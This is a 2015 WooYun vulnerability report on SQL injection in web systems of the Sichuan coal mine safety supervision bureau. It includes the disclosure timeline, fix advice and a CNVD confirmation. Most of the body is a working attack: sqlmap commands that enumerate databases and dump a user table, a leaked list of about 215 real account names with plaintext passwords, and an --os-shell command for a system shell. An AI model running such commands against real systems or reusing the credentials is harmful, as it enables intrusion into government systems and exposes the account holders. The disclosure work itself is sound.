当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138361

漏洞标题:四川煤矿安全监察局可导致内部信息泄露

相关厂商:四川煤矿安全监察局

漏洞作者: 闺土。

提交时间:2015-09-04 10:31

修复时间:2015-10-22 08:28

公开时间:2015-10-22 08:28

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-04: 细节已通知厂商并且等待厂商处理中
2015-09-07: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-17: 细节向核心白帽子及相关领域专家公开
2015-09-27: 细节向普通白帽子公开
2015-10-07: 细节向实习白帽子公开
2015-10-22: 细节向公众公开

简要描述:

看了一下服务器上面

详细说明:

**.**.**.**:8091 四川煤矿安全监察局 川北监察分局
**.**.**.**:8092 四川煤矿安全监察局 攀西监察分局
**.**.**.**:8093 四川煤矿安全监察局 川东监察分局
**.**.**.**:8094 四川煤矿安全监察局 川南监察分局
**.**.**.**:8095 四川煤矿安全监察局 川西监察分局
**.**.**.**:8096 四川省安全生产监督管理局
**.**.**.**:8097 四川煤矿安全监察局
均存在SQL注射型漏洞

sqlmap -u **.**.**.**:8092/dltable.asp?iid=2 --dbs


[*] ArticleDB
[*] master
[*] model
[*] msdb
[*] safenews
[*] SafeStat
[*] SafetySite2009
[*] scsafe_CB
[*] scsafe_CN
[*] scsafe_CX
[*] scsafe_CXCD
[*] scsafe_PX
[*] scsafetyv2011
[*] tempdb
sqlmap -u **.**.**.**:8092/dltable.asp?iid=2 -D SafeStat --tables
Database: SafeStat
[25 tables]
+----------------------+
| BaseAreaCode |
| BaseEight |
| BaseEights |
| BaseEnterprise |
| BaseFive |
| BaseFour |
| BaseOrg |
| BaseSeven |
| BaseSix |
| BaseSupervise |
| BaseSurvey |
| BaseSurveyTwo |
| BaseThree |
| CoalMineEnterprise |
| ScaleDownEnterprise |
| SpecialPerson |
| SysDataBackupHistory |
| SysFunction |
| SysLog |
| SysParam |
| SysRole |
| SysRoleFunction |
| SysSerialNoGenerator |
| SysUser |
| SysUserRole |
+----------------------+
sqlmap -u **.**.**.**:8092/dltable.asp?iid=2 -D SafeStat -T Sysuser --columns
Database: SafeStat
Table: Sysuser
[30 columns]
+-------------------+------------------+
| Column | Type |
+-------------------+------------------+
| BaseAreaCodeId | varchar |
| Birthdate | datetime |
| Birthplace | varchar |
| ChineseName | varchar |
| ClassName | varchar |
| CreatedBy | varchar |
| CreatedOn | datetime |
| CurrAreaID | varchar |
| DepartmentID | varchar |
| Description | varchar |
| Duration | datetime |
| EducationLevel | varchar |
| Family | varchar |
| HealthStatus | varchar |
| HomeTel | varchar |
| IDCardNo | varchar |
| MarriageStatus | varchar |
| ModifiedBy | varchar |
| ModifiedOn | datetime |
| OfficeTel | varchar |
| OrgCode | varchar |
| Password | varchar |
| Sex | varchar |
| SocialInsuranceID | varchar |
| Sysmanager | varchar |
| SystemRole | varchar |
| Title | varchar |
| UserID | uniqueidentifier |
| UserName | varchar |
| UserType | varchar |
+-------------------+------------------+

漏洞证明:

sqlmap -u **.**.**.**:8092/dltable.asp?iid=2 -D SafeStat -T Sysuser -C UserName,Password --dump


Database: SafeStat
Table: Sysuser
[215 entries]
+--------------------+--------------+
| UserName | Password |
+--------------------+--------------+
| 四川省统计账号 | 123456 |
| 成都统计账号 | TJ61885785 |
| 成都锦江区统计账号 | 86726743 |
| 成都青羊区统计账号 | 147258 |
| 成都金牛区统计账号 | 123456 |
| 成都武侯区统计账号 | 123456 |
| 成都成华区统计账号 | 123456 |
| 成都龙泉驿区统计账号 | 84852232 |
| 成都青白江区统计账号 | 83665717 |
| 成都金堂统计账号 | 84920601 |
| 成都双流统计账号 | 123456 |
| 成都温江区统计账号 | 82668563 |
| 成都郫县统计账号 | 751010 |
| 成都新都统计账号 | 789456 |
| 成都大邑统计账号 | 13882091179 |
| 成都蒲江统计账号 | 123456 |
| 成都新津统计账号 | 123456 |
| 成都都江堰统计账号 | jg89749935 |
| 成都彭州统计账号 | pzAJ,/ |
| 成都邛崃统计账号 | 1121123ldzh |
| 成都崇州统计账号 | 123456 |
| 自贡市统计账号 | 123456 |
| 自贡市贡井区统计账号 | 123456 |
| 自贡市自流井区统计账号 | 123456 |
| 自贡市大安区统计账号 | 123456 |
| 自贡市沿滩区统计账号 | ytajj5396199 |
| 自贡市荣县统计账号 | 610509 |
| 自贡市富顺统计账号 | 123456 |
| 攀枝花市统计账号 | 123456 |
| 攀枝花市西区统计账号 | 123456 |
| 攀枝花市东区统计账号 | 123456 |
| 攀枝花市仁和区统计账号 | 2900470 |
| 攀枝花市米易统计账号 | 123456 |
| 攀枝花市盐边统计账号 | 08128657385 |
| 泸州统计账号 | 123456 |
| 泸州江阳区统计账号 | 123456 |
| 泸州纳溪统计账号 | 123456 |
| 泸州龙马潭区统计账号 | 123456 |
| 泸州泸县统计账号 | 123456 |
| 泸州合江统计账号 | 5269793 |
| 泸州叙永统计账号 | 123456 |
| 泸州古蔺统计账号 | 654312 |
| 德阳统计账号 | 2300048 |
| 德阳旌阳区统计账号 | 123456 |
| 德阳中江统计账号 | 123456 |
| 德阳罗江统计账号 | 123456 |
| 德阳广汉统计账号 | JGK5223357 |
| 德阳什邡统计账号 | 8201106 |
| 德阳绵竹统计账号 | 123456 |
| 绵阳统计账号 | 123456 |
| 绵阳涪城区统计账号 | 123456 |
| 绵阳游仙区统计账号 | 123669adsa |
| 绵阳三台统计账号 | 5338622 |
| 绵阳盐亭统计账号 | 123456 |
| 绵阳安县统计账号 | 123456 |
| 绵阳梓潼统计账号 | 123456 |
| 绵阳北川羌族自治县统计账号 | 123456 |
| 绵阳平武统计账号 | 123456 |
| 绵阳江油统计账号 | 13178362 |
| 广元统计账号 | 123456 |
| 广元朝天区统计账号 | 123456 |
| 广元元坝区统计账号 | 123456 |
| 广元利州区统计账号 | 123456 |
| 广元旺苍统计账号 | 123456 |
| 广元青川统计账号 | 123456 |
| 广元剑阁统计账号 | 123456 |
| 广元苍溪统计账号 | 123456 |
| 遂宁统计账号 | 123456 |
| 遂宁大英统计账号 | 123456 |
| 遂宁安居区统计账号 | 234567 |
| 遂宁船山区统计账号 | 123456 |
| 遂宁蓬溪统计账号 | 123456 |
| 遂宁射洪统计账号 | 123456 |
| 内江统计账号 | 123456 |
| 内江东兴区统计账号 | 123456 |
| 内江市中区统计账号 | 123456 |
| 内江威远统计账号 | 123456 |
| 内江资中统计账号 | 725800 |
| 内江隆昌统计账号 | 654321 |
| 乐山统计账号 | 123456 |
| 乐山五通桥区统计账号 | 123456 |
| 乐山市中区统计账号 | 123456 |
| 乐山沙湾区统计账号 | 3441043 |
| 乐山金口河统计账号 | 123456 |
| 乐山犍为统计账号 | 258258 |
| 乐山井研统计账号 | 123456 |
| 乐山夹江统计账号 | 123456 |
| 乐山沐川统计账号 | 123456 |
| 乐山峨边彝族自治县统计账号 | 123456 |
| 乐山马边彝族自治县统计账号 | 123456 |
| 乐山峨眉山市统计账号 | 08335527611 |
| 南充统计账号 | 2224662 |
| 南充高坪区统计账号 | 123456 |
| 南充顺庆区统计账号 | 2255325 |
| 南充嘉陵区统计账号 | JLQ123456 |
| 南充南部统计账号 | 123456 |
| 南充营山统计账号 | 123456 |
| 南充蓬安统计账号 | 123456 |
| 南充仪陇统计账号 | 123456 |
| 南充西充统计账号 | XCXAJJ |
| 南充阆中统计账号 | 123456 |
| 宜宾统计账号 | 123456 |
| 宜宾南溪统计账号 | 123456 |
| 宜宾江安统计账号 | 123456 |
| 宜宾长宁统计账号 | 123456 |
| 宜宾高县统计账号 | 123456 |
| 宜宾珙县统计账号 | 123456 |
| 宜宾筠连统计账号 | 7683302 |
| 宜宾兴文统计账号 | 123456 |
| 宜宾屏山统计账号 | 694817 |
| 宜宾翠屏区统计账号 | 123456 |
| 宜宾宜宾县统计账号 | 123456 |
| 广安统计账号 | 123456 |
| 广安广安区统计账号 | 123456 |
| 广安岳池统计账号 | 123456 |
| 广安武胜统计账号 | 6224900 |
| 广安邻水统计账号 | 3222135 |
| 广安华蓥统计账号 | 826471555 |
| 达州市统计账号 | 123456 |
| 达州市通川区统计账号 | 123456 |
| 达州市万源统计账号 | 654123 |
| 达州市达县统计账号 | 551233 |
| 达州市宣汉统计账号 | 123456 |
| 达州市开江统计账号 | 123456 |
| 达州市大竹统计账号 | 123456 |
| 达州市渠县统计账号 | 13419098411 |
| 雅安统计账号 | 123456 |
| 雅安荥经县统计账号 | 123456 |
| 雅安雨城区统计账号 | 123456 |
| 雅安名山统计账号 | 123456 |
| 雅安汉源统计账号 | 123456 |
| 雅安石棉统计账号 | 123456 |
| 雅安天全统计账号 | 123456 |
| 雅安芦山统计账号 | 123456 |
| 雅安宝兴统计账号 | 123456 |
| 阿坝藏族羌族自治州统计账号 | 123456 |
| 阿坝藏族羌族自治州九寨沟统计账号 | 123456 |
| 阿坝藏族羌族自治州阿坝统计账号 | 123456 |
| 阿坝藏族羌族自治州汶川统计账号 | 123456 |
| 阿坝藏族羌族自治州理县统计账号 | 751205 |
| 阿坝藏族羌族自治州茂县统计账号 | 123456 |
| 阿坝藏族羌族自治州松潘统计账号 | 123456 |
| 阿坝藏族羌族自治州金川统计账号 | 123456 |
| 阿坝藏族羌族自治州小金统计账号 | 123456 |
| 阿坝藏族羌族自治州黑水统计账号 | 123456 |
| 阿坝藏族羌族自治州马尔康统计账号 | 123456 |
| 阿坝藏族羌族自治州壤塘统计账号 | 123456 |
| 阿坝藏族羌族自治州若尔盖统计账号 | 123456 |
| 阿坝藏族羌族自治州红原统计账号 | 123456 |
| 甘孜藏族自治州统计账号 | 123456 |
| 甘孜藏族自治州康定统计账号 | 123456 |
| 甘孜藏族自治州泸定统计账号 | 123456 |
| 甘孜藏族自治州丹巴统计账号 | 123456 |
| 甘孜藏族自治州九龙统计账号 | 123456 |
| 甘孜藏族自治州雅江统计账号 | 123456 |
| 甘孜藏族自治州道孚统计账号 | 123456 |
| 甘孜藏族自治州炉霍统计账号 | 123456 |
| 甘孜藏族自治州甘孜县统计账号 | 123456 |
| 甘孜藏族自治州新龙统计账号 | 123456 |
| 甘孜藏族自治州德格统计账号 | 123456 |
| 甘孜藏族自治州白玉统计账号 | 123456 |
| 甘孜藏族自治州石渠统计账号 | 123456 |
| 甘孜藏族自治州色达统计账号 | 123456 |
| 甘孜藏族自治州理塘统计账号 | 123456 |
| 甘孜藏族自治州巴塘统计账号 | 5623111 |
| 甘孜藏族自治州乡城统计账号 | 123456 |
| 甘孜藏族自治州稻城统计账号 | 123456 |
| 甘孜藏族自治州得荣统计账号 | 123456 |
| 凉山彝族自治州统计账号 | 123456 |
| 凉山彝族自治州西昌统计账号 | xcaj3234072 |
| 凉山彝族自治州木里藏族自治县统计账号 | 123456 |
| 凉山彝族自治州盐源统计账号 | 6367115 |
| 凉山彝族自治州德昌统计账号 | 123456 |
| 凉山彝族自治州会理统计账号 | 5629217 |
| 凉山彝族自治州会东统计账号 | 123456 |
| 凉山彝族自治州宁南统计账号 | 123456 |
| 凉山彝族自治州普格统计账号 | 123456 |
| 凉山彝族自治州布拖统计账号 | 123456 |
| 凉山彝族自治州金阳统计账号 | 123456 |
| 凉山彝族自治州昭觉统计账号 | 123456 |
| 凉山彝族自治州喜德统计账号 | 123456 |
| 凉山彝族自治州冕宁统计账号 | 123456 |
| 凉山彝族自治州越西统计账号 | 123456 |
| 凉山彝族自治州甘洛统计账号 | 123456 |
| 凉山彝族自治州美姑统计账号 | 123456 |
| 凉山彝族自治州雷波统计账号 | 123456 |
| 巴中统计账号 | 5260046 |
| 巴中巴州区统计账号 | 123456 |
| 巴中通江统计账号 | 123456 |
| 巴中南江统计账号 | 123456 |
| 巴中平昌统计账号 | 120832 |
| 眉山统计账号 | 123456 |
| 眉山东坡区统计账号 | 8231252 |
| 眉山仁寿统计账号 | <blank> |
| 眉山彭山统计账号 | 123456 |
| 眉山洪雅统计账号 | 1204842250 |
| 眉山丹棱统计账号 | 123456 |
| 眉山青神统计账号 | <blank> |
| 资阳统计账号 | 54110 |
| 资阳简阳统计账号 | 123456 |
| 资阳安岳统计账号 | 123456 |
| 资阳乐至统计账号 | 121212 |
| 资阳雁江区统计账号 | 26223027 |
| admin | 123456 |
| 绵阳高新区统计账号 | 123456 |
| 绵阳科创区统计账号 | 123456 |
| 绵阳经开区统计账号 | 123456 |
| 绵阳仙海区统计账号 | 123456 |
| 绵阳科学城统计账号 | 123456 |
| 成都高新区统计账号 | 123456 |
| 自贡市高新区统计账号 | 123456 |
| 广元经济开发区统计账号 | 123456 |
| 德阳开发区统计账号 | 123456 |
| 德阳市属统计账号 | 123456 |
| 宜宾临港开发区统计账号 | 123456 |
+--------------------+--------------+
sqlmap -u **.**.**.**:8094/dlTable.asp?iid=1 -os --shell
之前还可以反弹一个 administrator 组的权限 ,现在连不上。 不深入了。

修复方案:

内网使用的平台就不要暴露在公网了吧。
不需要的可以关闭。
web执行降权!

版权声明:转载请注明来源 闺土。@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-09-07 08:26

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给四川分中心,由其后续协调网站管理单位处置。

最新状态:

暂无